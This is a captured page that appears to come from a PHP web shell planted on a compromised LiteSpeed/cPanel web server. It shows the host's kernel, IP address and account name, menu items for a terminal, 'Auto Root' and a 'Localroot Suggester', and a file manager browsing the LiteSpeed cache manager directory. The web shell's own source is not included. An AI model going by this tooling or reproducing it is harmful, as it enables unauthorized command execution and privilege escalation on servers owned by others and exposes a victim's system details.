Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
webcachemgr /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxr-x
2025-09-11 15:22
MIN_VER
7
B
-rw-r--r--
2025-11-19 13:36
VERSION
6
B
-rw-rw-r--
2025-09-11 15:22
autoloader.php
885
B
-rw-rw-r--
2025-09-11 15:22
bootstrap.php
513
B
-rw-rw-r--
2025-09-11 15:22
bootstrap_cli.php
531
B
-rw-rw-r--
2025-09-11 15:22
Save
Rename
<?php /** ********************************************* * LiteSpeed Web Server Cache Manager * * @author Michael Alegre * @copyright 2018-2025 LiteSpeed Technologies, Inc. * ******************************************* */ use Lsc\Wp\Context\Context; use Lsc\Wp\Context\RootPanelContextOption; require_once __DIR__ . '/autoloader.php'; /** * @noinspection PhpUnhandledExceptionInspection * @noinspection PhpUndefinedVariableInspection */ Context::initialize(new RootPanelContextOption($panelName));